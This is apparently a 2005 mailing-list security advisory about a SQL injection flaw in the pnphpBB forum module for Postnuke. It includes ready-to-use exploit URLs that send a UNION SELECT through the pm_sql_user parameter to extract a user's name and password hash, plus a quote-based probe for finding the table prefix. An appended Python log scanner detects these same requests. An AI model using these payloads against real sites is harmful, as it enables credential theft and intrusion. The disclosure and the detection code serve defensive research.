[ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]


Date: Tue, 01 Mar 2005 17:15:27 +0100
From: Jose Pedro Andres <jpandres@sync.es.>
To: [email protected]
Subject: [ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-AntiVirus: scanned for viruses by AMaViS 0.2.1 (http://amavis.org/)
X-Virus-Scanned: antivirus-gw at tyumen.ru

Nothing wasted here....




[Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor]

Author: Jocanor
Date: 01-03-2k5


1. -----------introduction--------.

Postnuke is an open source CMS (content management system), originally 
based on PHP-Nuke. (www.postnuke.com)

pnphpbb is a module for Postnuke based on the popular phpBB forum system. 
(www.phpbb.com)

2. ------------the bug------------

On 26-03-04 Janek Vind discovered a bug in phpBB forums, in the privmsg.php 
file, described in Bugtraq ID 9984; the bug also affects PHP-Nuke. Bugtraq 
provides exploits for this bug in PHP-Nuke and phpBB.

But the Pnphpbb module (Postnuke phpBB) is also vulnerable to this 
issue, and it is easy to exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here]

3 -------- the exploit ----------

Working exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*

Shows the password hash of the user with uid = 2.

4. ------important notes-----

Note: if it doesn't work, change the nuke_ prefix to the valid one; you 
can get the valid table prefix by causing an error like this:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20'
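As an added defender-side example (not part of the advisory, and not pnphpBB or Postnuke code): a small Python scanner that reads Common Log Format access-log lines and flags any request that supplies pm_sql_user to the PNphpBB2 privmsg handler from outside, separating UNION/SELECT extraction attempts from the quote-based error probe shown above. The log lines are constructed samples, and the classification thresholds are my own assumptions.

```python
"""Flag requests that smuggle a pm_sql_user fragment into PNphpBB2's privmsg
handler. Added example for this advisory, not code from Postnuke or pnphpBB."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2005:17:15:27 +0100] "GET /index.php?name=PNphpBB2&file=privmsg&folder=inbox HTTP/1.0" 200 5123
192.0.2.11 - - [01/Mar/2005:17:16:02 +0100] "GET /index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass%20from%20nuke_users/* HTTP/1.0" 200 2210
192.0.2.12 - - [01/Mar/2005:17:16:40 +0100] "GET /index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20' HTTP/1.0" 500 811
192.0.2.13 - - [01/Mar/2005:17:17:05 +0100] "GET /index.php?name=News&file=article&sid=7 HTTP/1.0" 200 9001
"""

# ip, timestamp, method, request target and status code of a CLF line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return a verdict for one request target, or None when the request is
    not a pm_sql_user override aimed at the PNphpBB2 privmsg handler."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("name") != ["PNphpBB2"] or params.get("file") != ["privmsg"]:
        return None
    if "pm_sql_user" not in params:
        return None
    # parse_qs already percent-decodes, so "%20UNION%20" shows up as plain text
    fragment = params["pm_sql_user"][0]
    if re.search(r"\b(union|select)\b", fragment, re.IGNORECASE):
        return "union-select"   # data extraction attempt (section 3 pattern)
    if "'" in fragment or "/*" in fragment or "--" in fragment:
        return "error-probe"    # prefix discovery via a forced SQL error (section 4)
    return "override"           # any externally supplied fragment is still unexpected


def scan_log(text):
    """Return (ip, timestamp, status, verdict) for every flagged log line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a CLF line, skip it
        verdict = classify_request(m["target"])
        if verdict:
            findings.append((m["ip"], m["ts"], int(m["status"]), verdict))
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

The "override" verdict matters as much as the other two: the parameter is a SQL fragment the script is supposed to build itself, so a request carrying it at all is the signal, regardless of payload.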


5----- Contact -----

Author: Jocanor
Location: Spain
Email: jocanor [at] gmail [dot] com

JoCaNoR SeCuRiTy ReaSoNS

EOF.




